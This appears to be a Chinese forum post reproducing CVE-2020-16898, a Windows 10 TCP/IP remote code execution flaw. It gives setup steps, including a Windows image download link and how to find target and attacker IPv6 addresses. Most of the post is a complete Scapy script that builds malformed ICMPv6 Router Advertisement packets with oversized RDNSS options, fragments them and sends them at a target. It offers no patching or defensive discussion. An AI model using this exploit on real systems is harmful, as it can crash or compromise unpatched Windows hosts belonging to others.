CVE-2020-16898 微软TCP/IP远程执行代码漏洞
影响版本:
下载Windows 10 镜像
1909
ed2k://|file|cn_windows_10_business_editions_version_1909_x64_dvd_0ca83907.iso|5275090944|9BCD5FA6C8009E4D0260E4B23008BD47|/测试版本:
安装scapy
pip3 install scapy 获取目标机IPv6 地址
IPv6 地址 . . . . . . . . . . . . : fd15:4ba5:5a2b:1008:940f:5491:31c4:c4ff
临时 IPv6 地址. . . . . . . . . . : fd15:4ba5:5a2b:1008:8024:287d:cfc5:17e2
本地链接 IPv6 地址. . . . . . . . : fe80::940f:5491:31c4:c4ff%7任意均可
获取攻击机的IPv6 地址
本地链接 IPv6 地址. . . . . . . . : fe80::588b:30b8:bc:589f%17
开始攻击
利用脚本下载:[wm_reply]
[wm_red]
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6
v6_dst = “fe80::940f:5491:31c4:c4ff%7”
v6_src = “fe80::588b:30b8:bc:589f%17″
p_test_half = ‘A’.encode()*8 + b”\x18\x30″ + b”\xFF\x18”
p_test = p_test_half + ‘A’.encode()*4
c = ICMPv6NDOptEFA()
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
“AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA” ]
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8
pkt = ICMPv6ND_RA() / aaa / \
Raw(load=’A’.encode()*16*2 + p_test_half + b”\x18\xa0″*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
[/wm_red]
[/wm_reply]
666
.